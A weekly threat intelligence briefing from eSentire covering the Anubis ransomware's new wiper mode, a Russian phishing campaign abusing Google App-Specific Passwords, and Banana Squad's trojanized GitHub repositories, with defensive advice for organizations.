eSentire's Threat Response Unit (TRU) compiles the following weekly intelligence overview, providing cybersecurity leaders with expert analysis and insights on the most important events of the past week along with important security tips.
Recent Threat Intelligence Advisories
Noteworthy News
New Anubis RaaS Includes a Wiper Module
Bottom Line: Recent reports indicate that the Anubis Ransomware-as-a-Service (RaaS) toolkit has incorporated a wiper module into the malware. This new module can be used to permanently delete the content of files from infected hosts, adding additional pressure to victim organizations to meet extortion demands.
On June 13th, 2025, Trend Micro released a report detailing the tactical evolution of an emerging Ransomware-as-a-Service (RaaS) operation known as Anubis. Active since December 2024, Anubis provides its affiliates with a double extortion model, combining data encryption with the threat of data exposure. The latest report highlights the introduction of a destructive wiper feature, enabling the affiliates with both data encryption and data destruction capabilities.
Anubis first appeared in late 2024 as a variant of Sphinx ransomware, rebranding itself with an updated ransom note function. Representatives of Anubis RaaS introduced new affiliate programs in February 2025. Namely, Anubis Ransomware – 80/20,” “Anubis Data Ransom – 60/40,” and “Access Monetization – 50/50” on cybercrime forums such as RAMP and XSS. These offerings present varied profit sharing structures to attract a broader base of affiliates. Anubis has been known to target diverse industries, including healthcare, engineering, and construction, across the United States, Canada, Australia, and Peru.
The ransomware typically spreads through spear-phishing emails containing malicious links, and it exploits legitimate administrative accounts to bypass detection mechanisms. Once deployed, Anubis deletes Windows Volume Shadow copies to block recovery options and proceeds to encrypt system directories. It utilizes the same encryption algorithm observed in the EvilByte/Prince ransomware family, modifies the icons of encrypted files, and drops a ransom note. The recent addition of the wiper feature introduces a /WIPEMODE parameter, which permanently deletes the contents of the files, further complicating recovery efforts and increasing pressure on victims to comply with ransom demands.
eSentire Threat Intelligence Analysis:
RaaS models have been favored by threat actors as they allow even inexperienced attackers to launch sophisticated ransomware campaigns. The affiliate programs promoted by Anubis extend beyond standard RaaS offerings by enabling affiliates to monetize not only encrypted data but also stolen sensitive information and access credentials. The addition of a wiper functionality significantly escalates the threat, posing a serious security concern for organizations. At the same time, it enhances the appeal of the platform to potential affiliates, making Anubis a more attractive candidate in the RaaS landscape.
A report by KELA assesses that Anubis’ operators may have been former affiliates of other ransomware groups or have experience with data extortion and ransomware-related activities, based on the actor’s statements regarding their. ransomware capabilities and the informative, well-written investigative articles on their victims.
While the primary goal of traditional ransomware is to encrypt data and demand payment for its decryption, many modern variants like Anubis ransomware employ robust encryption techniques that, without the decryption key, make data restoration virtually impossible. This blurs the line between ransomware and wipers. While a wiper is designed explicitly to destroy data with no possibility of recovery, advanced ransomware can have the same practical effect. With functionalities like Anubis’s /WIPEMODE, attackers now have the intentional choice to use ransomware as a wiper, further emphasizing the dual threat of data loss and operational disruption. This evolution intensifies the urgency for organizations to adopt a defense-in-depth approach that includes comprehensive backup, detection, and incident response strategies.
The eSentire Threat Intelligence Team is consistently tracking the developments in Anubis RaaS for new detection opportunities. eSentire MDR Suite has detections in place to identify activity associated with ransomware deployment.
Creative Phishing Attack on Prominent Academics and Critics of Russia
Bottom Line: Russian state-sponsored threat actors, identified as UNC6293, conducted a sophisticated phishing campaign against prominent academics and critics of the Russian government by impersonating U.S. State Department officials. This operation exploited Google account features to gain persistent access to victims' communications, indicating a targeted effort to extract valuable insights on Russian affairs.
On June 18th, 2025, the Google Threat Intelligence Group (GTIG) and The Citizen Lab reported that Russian state-sponsored threat actors, identified as UNC6293, posed as U.S. State Department officials to target prominent academics and critics of the Russian government.One of the victims of this sophisticated social engineering campaign was Mr. Keir Giles, a recognized academic expert on Russian information operations. He was successfully deceived into creating and sharing App-Specific Passwords (ASPs), which allowed attackers to bypass Multi-Factor Authentication (MFA). The attacker impersonated a U.S. State Department official and orchestrated the attack over several weeks through detailed, credible interactions. Google later detected and disrupted the operation, attributing it to the Russian state-backed group UNC6293, which has a low-confidence association with APT29/ICECAP.
The attack began on May 22nd, 2025, when he received an email from someone claiming to be from the U.S. State Department. The message appeared legitimate, as it included four “@state.gov” addresses in the CC field and was received during typical U.S. working hours. However, all the .gov emails were fictitious, created by the attacker to enhance credibility. The threat actor eventually convinced Mr. Giles to register for a fake “MS DoS Guest Tenant” platform by following instructions in a well-crafted PDF document. This document guided him through creating and submitting App-Specific Passwords under the guise of setting up secure communications with the State Department.
The attacker asked Mr. Giles to enter “ms.state.gov” in the application name field when generating the ASP. Ultimately, Mr. Giles created and sent multiple ASPs, unknowingly granting persistent access to his accounts. Google later identified suspicious login activity originating from a Digital Ocean IP address and locked down the impacted accounts.
GTIG identified two distinct campaigns that occurred between April and June 2025, differentiated by their ASP naming patterns: "ms.state.gov" in the first campaign and themes related to Ukraine and Microsoft in the second. Through the analysis of shared infrastructure, including residential proxies and VPS servers, GTIG linked both campaigns to the same cluster.
eSentire Threat Intelligence Analysis:
The use of App-Specific Passwords in this type of attack is a relatively new development. These passwords are typically used for connecting apps to email services without requiring full credentials and are not protected by MFA. As a result, they represent a soft target for sophisticated threat actors seeking to circumvent security controls. This campaign highlights a new trend in phishing operations, where attackers utilize App-Specific Passwords to circumvent MFA through highly convincing and methodical deception. As attackers continue to refine their techniques, both individuals and organizations must remain vigilant.
This is not the first time that a sophisticated Russian APT group has employed advanced social engineering tactics; showing a specific interest by these groups in attacks misusing legitimate features. Microsoft and Volexity both released long-form reports on suspected Russian state-sponsored APT groups (Storm-2372, CozyLarch, UTA0304, and UTA0307) carrying out Device Code Authentication phishing attacks to compromise victim organizations. Device Code Authentication phishing involves exploiting the “device code authentication flow to capture authentication tokens”, allowing threat actors to access target accounts and other services that the account has access to. In observed attacks, phishing emails impersonated Microsoft Teams meeting invitations and prompted users to authenticate via a threat actor-generated device code; using the device code would provide threat actors with a valid access token, allowing them to access victim resources including accounts, emails, and cloud storage without requiring a password.
As attackers move beyond basic credential theft, they are investing in long-form, personalized, and believable engagement with targets. The success of these techniques may encourage threat actors to avoid using malicious attachments in their communications while engaging with top level executives, as the majority of advanced security products block/flag these attachments right from the start. For defenders, this raises important considerations: security awareness training must go beyond “don’t click suspicious links” to include education on trust manipulation, deceptive workflows, and account feature misuse. Moreover, security teams must audit the tools and features users have access to, such as ASPs, and implement guardrails. Users are also recommended to carefully monitor notifications about ASP creation sent to their Gmail, recovery email, and signed-in devices to ensure authenticity.
Russian Threat Actor Banana Squad Deploying Malicious GitHub Repositories
Bottom Line: A Russian threat actor group, Banana Squad, involved in a supply chain attack campaign, was observed leveraging malicious GitHub repositories to deliver Python-based trojanized tools serving as information stealers.
On June 18th, 2025, ReversingLabs published a report on a supply chain attack, targeting GitHub repositories. Supply chain attacks are cyberattacks that target a trusted third-party vendor, which can impact customer organizations that are part of the supply chain. In the reported campaign, ReversingLabs observed the Russian threat group Banana Squad publishing 67 malicious repositories to GitHub, which were “trojanized look-alikes” of identically named legitimate repositories, relating to Python-based hacking tools.
Banana Squad was first reported on by Checkmarx in April 2023 and were observed performing similar supply chain attacks within GitHub. This campaign involved the deployment of Windows-based payloads on infected hosts, which were designed to steal sensitive data from applications, web browsers, and cryptocurrency wallets. ReversingLabs uncovered the new campaign while reviewing malicious URL indicators found within their network threat intelligence dataset.
ReversingLabs observed that for many of the malicious repositories involved in this campaign, the owner only had one repository listed under their GitHub account, noting that this was an indication that the accounts were created solely for this campaign. ReversingLabs attributed the campaign to Banana Squad based on the payload URL structure observed, and the structure of the trojanized Python files contained within the malicious repositories. ReversingLabs reported these repositories to GitHub, who was able to remove them, and ReversingLabs notes that they do not have any information on how many times the files were downloaded while they were active.
eSentire Threat Intelligence Analysis:
Supply chain attacks have increased in popularity in recent years, with reports indicating that these attacks surged by 431% between 2021 and 2023, and are continuing to rise as of 2025. Notable supply chain attacks include the Russian state-sponsored group Nobelium (APT29, Cozy Bear) conducting the SolarWinds attack in 2020 which delivered backdoor malware to thousands of SolarWinds customers, and the REvil ransomware group exploiting a Zero-Day vulnerability within Kaseya VSA to push ransomware to the customers of impacted Managed Security Providers (MSPs), in July 2021. These examples underscore the threat of supply chain attacks, where threat actors can target multiple organizations through the compromise of one access point, and exploit the trust that is placed in third-party vendors within the supply chain.
Supply chain attacks involving GitHub, and other Open-Source Software (OSS) platforms, are also not novel techniques, with many campaigns having been observed where threat actors utilize similar tactics. Examples include the North Korean-linked Lazarus Group being observed uploading malicious Node Package Manager (NPM) packages to GitHub containing the BeaverTail malware, and a financially motivated threat actor, dubbed Water Curse by Trend Micro, deploying malicious Visual Studio project configuration files within open-source penetration testing applications found on GitHub. All these examples highlight the notion that threat actors abuse the inherent trust that organizations place in GitHub's repository infrastructure, leveraging it as a means for malware distribution.
ReversingLabs does not provide specifics on the intended outcome of the recently observed Banana Squad campaign, but historic campaigns from the group resulted in the deployment of information stealer malware. Based on this trend, it is likely that the reported campaign results in a similar outcome, with an intended goal of stealing sensitive data from infected hosts. The usage of information stealer malware has been observed increasing year over year, with a 31% increase in incidents from 2023 to 2024, and information stealer infections resulting in 75% of the 3.2 billion credentials stolen in 2024. The theft of data from these infections can be sold to other threat actors, as they can allow direct access to systems while bypassing security measures, enabling further attacks.
To protect against GitHub supply chain attacks, organizations that utilize GitHub should validate the build files, scripts, and histories of all repositories and third party code used within the environment prior to its implementation. If GitHub is not used, its access should be restricted to prevent unauthorized use of open-source tools. Organizations should ensure that Endpoint Detection and Response (EDR) tools are installed on all assets, implement regular password rotation policies, and enforce Multi-Factor Authentication on all accounts, which can reduce the impact of stolen credentials. eSentire MDR for Endpoint has detections in place monitoring for script download activity from GitHub, and eSentire’s Threat Response Unit (TRU) continues to track these campaigns for additional information and detection opportunities.
About the threat briefings:
The threat briefing is a weekly intelligence overview for non-technical users. The Threat Intelligence team at eSentire investigates, analyzes, and organizes the most important events of the past week along with important security tips and redistributes the findings for quick reading. The main goal of this briefing is to improve the overall awareness of readers regarding cyber security.
